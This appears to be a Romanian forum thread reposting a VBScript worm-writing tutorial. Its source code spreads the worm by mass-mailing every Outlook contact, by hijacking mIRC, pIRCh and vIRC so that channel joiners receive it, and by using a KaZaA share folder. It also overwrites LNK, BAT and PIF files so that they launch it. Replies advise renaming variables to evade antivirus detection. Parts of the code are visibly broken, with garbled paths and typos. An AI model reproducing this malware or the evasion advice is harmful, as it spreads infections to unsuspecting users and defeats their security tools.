8 ways to spread a worm using VB(trebuie vazut!!)

[Sub_Zero]

Crediturile pentru acest tutorial ii revin lui SPTH

1. eMail spreading

2. mIRC spreading

3. pIRCh spreading

4. vIRC spreading

5. KaZaA spreading

6. LNK dropping

7. BAT dropping

8. PIF dropping

1) eMail spreading

First you'll find the eMail-spreading-source:

Dim x

on error resume next

Set fso ="Scripting.FileSystem.Object"

Set so=CreateObject(fso)

Set ol=CreateObject("Outlook.Application")

Set out= WScript.CreateObject("Outlook.Application")

Set mapi = out.GetNameSpace("MAPI")

Set a = mapi.AddressLists(1)

For x=1 To a.AddressEntries.Count

Set Mail=ol.CreateItem(0)

Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)

Mail.Subject="Subject"

Mail.Body="Body"

Mail.Attachments.Add Wscript.ScriptFullName

Mail.Send

Next

ol.Quit

The Virus searchs for every email adress in the addressbook. Then sending itself to these addresses. It's really easy, I think.

2) mIRC spreading

The source first:

Dim mirc

set fso=CreateObject("Scripting.FileSystemObject")

set mirc=fso.CreateTextFile("C:mircscript.ini")

fso.CopyFile Wscript.ScriptFullName, "C:mircattachment.vbs", True

mirc.WriteLine "[script]"

mirc.WriteLine "n0=on 1:join:*.*: { if ( $nick !=$me ) {halt} /dcc send $nick C:mircattachment.vbs }

mirc.Close

First The virus copies itself to C:mircattachment.vbs Then it canges the mIRC-script.ini file. So every user in the same chatroom gets an infect file.

3) pIRCh spreading

Source:

Dim pirch

set fso=CreateObject("Scripting.FileSystemObject")

set mirc=fso.CreateTextFile("C:pirch98events.ini")

fso.CopyFile Wscript.ScriptFullName, "C:mircattachment.vbs", True

pirch.WriteLine "[Levels]");

pirch.WriteLine "Enabled=1");

pirch.WriteLine "Count=6");

pirch.WriteLine "Level1=000-Unknows"

pirch.WriteLine "000-UnknowsEnabled=1"

pirch.WriteLine "Level2=100-Level 100"

pirch.WriteLine "100-Level 100Enabled=1"

pirch.WriteLine "Level3=200-Level 200"

pirch.WriteLine "200-Level 200Enabled=1"

pirch.WriteLine "Level4=300-Level 300"

pirch.WriteLine "300-Level 300Enabled=1"

pirch.WriteLine "Level5=400-Level 400"

pirch.WriteLine "400-Level 400Enabled=1"

pirch.WriteLine "Level6=500-Level 500"

pirch.WriteLine "500-Level 500Enabled=1"

pirch.WriteLine "[000-Unknowns]"

pirch.WriteLine "User1=*!*@*"

pirch.WriteLine "UserCount=1"

pirch.WriteLine "Events1=ON JOIN:#: /dcc send $nick C:pirch98attachement.vbs"

pirch.WriteLine "EventCount=1"

pirch.WriteLine "[100-Level 100]"

pirch.WriteLine "UserCount=0"

pirch.WriteLine "EventCount=0"

pirch.WriteLine "[200-Level 200]"

pirch.WriteLine "UserCount=0"

pirch.WriteLine "EventCount=0"

pirch.WriteLine "[300-Level 300]"

pirch.WriteLine "UserCount=0"

pirch.WriteLine "EventCount=0"

pirch.WriteLine "[400-Level 400]"

pirch.WriteLine "UserCount=0"

pirch.WriteLine "EventCount=0"

pirch.WriteLine "[500-Level 500]"

pirch.WriteLine "UserCount=0"

pirch.WriteLine "EventCount=0"

pirch.Close

It's the same as mIRC spreading. First the worm made a copy of itself in the pIRCh direction (C:pirch9b), then changes the event.ini file, so every user get an infect file.

4) vIRC spreading

VBS vIRC source:

set fso=CreateObject("Scripting.FileSystemObject")

fso.CopyFile Wscript.ScriptFullName, "C:Vircattachment.vbs", True

set shell=CreateObject("WScript.Shell")

shell RegWrite "HKEY_CURRENT_USER.DefaultSoftwareMeGaLiTh SoftwareVisual IRC 96EventsEvent17", "dcc send $nick C:Vircattachment.vbs"

It's a really short code. First you need a copy of the virus, than change a registry key. That's all...

5) KaZaA spreading

Source:

set fso=CreateObject("Scripting.FileSystemObject")

fso.CopyFile Wscript.ScriptFullName, "C:KazaaNirvana - You Know You Are Right.vbs", True

set shell=CreateObject("WScript.Shell")

shell.RegWrite "HKLMSoftwareKaZaATransferDlDir0", "C:Kazaa");

You make a copy of the virus in the C:Kazaa-direction. Then make a registry-key. Every file in the direction (here it is "C:kazaa") other user can download. I think, you will understand it.

6) LNK dropping

Dropping means, that every LNK file opens the virus. Look at the code:

Dim shell, msc, batch, fso

set fso=CreateObject("Scripting.FileSystemObject")

fso.CopyFile Wscript.ScriptFullName, "C:vbs.vbs", True

set shell=wscript.createobject("wscript.shell")

set msc=shell.CreateShortCut("C:vbs.lnk")

msc.TargetPath=shell.ExpandEnvironment("C:vbs.vbs")

msc.WindowStyle=4

msc.Save

set batch=fso.CreateTextFile("C:lnk.bat")

batch.WriteLine "cls"

batch.WriteLine "@echo off"

batch.WriteLine "for %%a in (*.lnk ..*.lnk *.lnk %path%*.lnk %tmp%*.lnk %temp%*.lnk %windir%*.lnk) do copy C:vbs.lnk %%a"

batch.Close

shell.Run "C:lnk.bat"

First the virus makes a copy of itself to C:vbs.vbs Then it generates a LNK file, which opens the C:vbs.vbs-file. Then the virus makes a batch file, which copies the LNK-file to every LNK file it can find.

7) BAT dropping

Source first:

Dim shell, batcha, batchb, fso

set fso=CreateObject("Scripting.FileSystemObject")

fso.CopyFile Wscript.ScriptFullName, "C:vbs.vbs", True

set batcha=fso.CreateTextFile("C:bat.bat")

batcha.WriteLine "cls"

batcha.WriteLine "@echo off"

batcha.WriteLine "cscript C:vbs.vbs"

batcha.Close

set batchb=CreateTextFile("C:bata.bat")

batchb.WriteLine "cls"

batchb.WriteLine "@echo off"

batchb.WriteLine "for %%a in (*.bat ..*.bat *.bat %path%*.bat %tmp%*.bat %temp%*.bat %windir%*.bat) do copy C:bat.bat %%a"

batchb.Close

shell.Run "C:lnk.bat"

First the virus copies itself to C:vbs.vbs. Than it generates a batch-file (C:bat.bat) which opens the virus-copy. Than te virus generates a second batch file, which copies the first one to every batch-files it can find.

PIF dropping

PIF files open DOS-files. Yes, but VBS is a windows file?? what to do?

Source:

Dim shell, msc, batch, fso, batchb

set fso=CreateObject("Scripting.FileSystemObject")

fso.CopyFile Wscript.ScriptFullName, "C:vbs.vbs", True

set batch=CreateTextFile("C:bat.bat")

batch.WriteLine "cls"

batch.WriteLine "@echo off"

batch.WriteLine "cscript C:vbs.vbs"

batch.Close

set shell=wscript.createobject("wscript.shell")

set msc=shell.CreateShortCut("C:pif.lnk")

msc.TargetPath=shell.ExpandEnvironment("C:bat.bat")

msc.WindowStyle=4

msc.Save

set batchb=CreaateTextFile("C:pif.bat")

batchb.WriteLine "cls"

batchb.WriteLine "@echo off"

batchb.WriteLine "for %%a in (*.pif ..*.pif *.pif %path%*.pif %tmp%*.pif %temp%*.pif %windir%*.pif) do copy C:pif.pif %%a"

batchb.Close

shell.Run "C:pif.bat"

First the virus copies itself to C:vbs.vbs. Than it generates a batch file, which opens the virus. Than it generates a PIF file, which opens the batch file. You can see, that the code should generates a LNK, but VBS "know" that BAT is a DOS file, so it makes a DOS-ShourtCut, and that's PIF. Ok, go on, the vbs file generates a second BAT file, which copies the PIF to every PIF-file, it can find.

Before starting writing this article, i don't really like to program in VBS, because I thought, it's a ScriptKiddy language. But after a while I liked it more and more, because I'm able to make really nice things like file-dropping or other stuff. I hope U also enjoyed reading this tutorial about VisualBasicScript.

[F1BDM7]

daca faci ca primul..il detecteaza antivirusul ca nu mai stiu ce..si probabil si restu' la fel

[Icarius]

cam toate sunt scipturi VB folosite in virusi cum ar fi: "Mellisa", "I Love You", etc si dupa cum stiti scripturile nu sunt compilate. In orice caz dc scrieti codul exact si incercati sa il comilati tot vil da ca fiind virus. Incercati sa scimbati denumirile variabilelor. Un fel de Polimorfie..